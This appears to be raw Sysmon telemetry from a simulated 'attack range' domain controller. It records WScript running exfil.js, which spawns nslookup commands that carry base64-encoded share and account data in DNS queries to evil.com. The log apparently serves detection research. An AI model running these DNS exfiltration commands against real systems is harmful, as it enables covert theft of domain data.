14:21:35.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.044{2E1864BB-18E0-629A-6742-000000005F02}39765896C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-2344-000000005F02}1696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.049{2E1864BB-18EF-629A-2344-000000005F02}1696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnrc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.044{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltnyj.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.997{2E1864BB-18EE-629A-2144-000000005F02}5724336C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-2244-000000005F02}5928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.997{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2244-000000005F02}5928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.997{2E1864BB-18EE-629A-2044-000000005F02}49365472C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-2244-000000005F02}5928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.000{2E1864BB-18EF-629A-2244-000000005F02}5928C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-2044-000000005F02}4936C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltnyj.tmp 2>&1 23542300x800000000000000044805Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:35.564{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21FA601CC7C18CA2AB8575A0015468FA,SHA256=B694D1A9ED937F32C98A34EF4CFF1C2B8AAFEC921C5E729956B48E098FEB7985,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044804Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:32.727{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52385-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000210849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.982{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsnu.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.960{2E1864BB-18F0-629A-6944-000000005F02}47842604C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-6A44-000000005F02}4468C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.960{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.960{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.960{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.944{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.944{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6A44-000000005F02}4468C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.944{2E1864BB-18F0-629A-6844-000000005F02}62446028C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-6A44-000000005F02}4468C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.959{2E1864BB-18F0-629A-6A44-000000005F02}4468C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-6844-000000005F02}6244C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsnu.tmp 2>&1 354300x8000000000000000210840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.976{00000000-0000-0000-0000-000000000000}3360<unknown process>-udptruefalse127.0.0.1-50802-false127.0.0.1-53domain 354300x8000000000000000210839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.915{00000000-0000-0000-0000-000000000000}2900<unknown process>-udptruefalse127.0.0.1-50799-false127.0.0.1-53domain 354300x8000000000000000210838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.914{00000000-0000-0000-0000-000000000000}2900<unknown process>-udptruefalse127.0.0.1-50798-false127.0.0.1-53domain 354300x8000000000000000210837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.788{00000000-0000-0000-0000-000000000000}2872<unknown process>-udpfalsefalse127.0.0.1-50793-false127.0.0.1-53domain 10341000x8000000000000000210836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.929{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-6944-000000005F02}4784C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.929{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-6944-000000005F02}4784C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.929{2E1864BB-18F0-629A-6944-000000005F02}47842604C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-6844-000000005F02}6244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.913{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6944-000000005F02}4784C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERN